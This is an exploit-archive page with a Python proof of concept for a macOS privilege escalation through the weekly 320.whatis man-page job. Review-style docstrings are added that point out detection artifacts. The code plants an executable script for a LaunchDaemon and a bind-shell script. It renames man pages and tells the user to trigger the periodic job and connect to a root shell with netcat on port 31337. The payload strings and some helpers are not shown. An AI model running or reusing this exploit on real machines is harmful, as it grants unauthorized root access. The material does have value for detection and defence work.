Exploits / Vulnerability Discovered : 2020-05-12 |
Type : local |
Platform : macos
This exploit / vulnerability, "macOS 320.whatis script privilege escalation", is for educational purposes only; if you use it, you do so at your own risk!
def create_quick_scripts():
    """Write the "quick" shell script to /Applications/Scripts/sample.sh.

    Calls create_scripts_dir() first, then writes the module-level string
    sh_quick_content to the file and marks it executable. Both names are
    defined outside this part of the file, so the script's contents are not
    visible here.

    Review note: per the status message, the file is meant to be run by a
    LaunchDaemon. A new executable appearing under /Applications/Scripts/
    is therefore one of the on-disk artifacts this PoC leaves behind.
    """
    script_path = '/Applications/Scripts/sample.sh'
    create_scripts_dir()
    print("[i] Creating script file to be called by LaunchDaemon")
    with open(script_path, 'w') as handle:
        handle.write(sh_quick_content)
    # Shell out for chmod, as the original does; the path is a fixed literal.
    os.system('chmod +x /Applications/Scripts/sample.sh')
def create_reboot_scripts():
    """Write the "reboot" variant: sample.sh plus a companion bind.py.

    Calls create_scripts_dir() first, then writes two files under
    /Applications/Scripts/:

    * sample.sh - filled with sh_reboot_content and made executable.
    * bind.py   - filled with python_bind_content; no chmod is applied to
      this file here.

    create_scripts_dir and both content strings are defined outside this
    part of the file.

    Review note: the status messages describe sample.sh as the file a
    LaunchDaemon will call and bind.py as a bind shell. Both paths are
    fixed, so they can be used directly as file-creation indicators.
    """
    shell_script = '/Applications/Scripts/sample.sh'
    bind_script = '/Applications/Scripts/bind.py'

    create_scripts_dir()

    print("[i] Creating script file to be called by LaunchDaemon")
    with open(shell_script, 'w') as handle:
        handle.write(sh_reboot_content)
    # Shell out for chmod, as the original does; the path is a fixed literal.
    os.system('chmod +x /Applications/Scripts/sample.sh')

    print("[i] Creating python script for bind shell")
    with open(bind_script, 'w') as handle:
        handle.write(python_bind_content)
def rename_man_pages():
    """Prefix every digit-leading file under /usr/local/share/man with 'a'.

    Walks the whole tree and renames each file whose name starts with an
    ASCII digit to 'a' + name, printing the original path after each rename.

    Review note: the reason for the rename is not stated in this part of
    the file. The change is never undone in the visible code, so renamed
    entries under /usr/local/share/man stay behind as evidence that the
    script ran, and they need restoring during cleanup.
    """
    digits = "0123456789"
    for folder, _subdirs, names in os.walk("/usr/local/share/man"):
        for name in names:
            if name[0] not in digits:
                continue
            source = os.path.join(folder, name)
            target = os.path.join(folder, 'a' + name)
            os.rename(source, target)
            print("[i] Renaming: " + source)
def main():
    """Command-line entry point: expects exactly one argument, quick or reboot.

    With the wrong number of arguments it prints the usage line and exits
    with status 1. With an unrecognised mode it prints an error plus the
    usage line and returns without touching anything.

    Both valid modes call create_man_file() and create_symlink() (defined
    outside this part of the file), then the mode-specific script writer,
    then rename_man_pages(), and finally print the follow-up instructions.

    Review note: the printed instructions show that nothing runs as root
    until the weekly periodic job is run (`sudo periodic weekly`) and a
    LaunchDaemon plist named com.sample.Load.plist is loaded. The reboot
    text also names a listener on loopback port 31337. Those are the
    points to watch when testing detection against this PoC.
    """
    usage = "[-] Usage: python makewhatis_exploit.py [quick|reboot]"

    if len(sys.argv) != 2:
        print(usage)
        sys.exit (1)

    mode = sys.argv[1]
    if mode not in ('quick', 'reboot'):
        print("[-] Invalid arguments")
        print(usage)
        return

    # Steps shared by both modes.
    create_man_file()
    create_symlink()

    if mode == 'quick':
        create_quick_scripts()
        closing = "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] and then simulate a boot load with: \nsudo launchctl load com.sample.Load.plist"
    else:
        create_reboot_scripts()
        closing = "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] reboot macOS or run `sudo launchctl load com.sample.Load.plist` and connect to your root shell via:\nnc 127.1 31337"

    rename_man_pages()
    print(closing)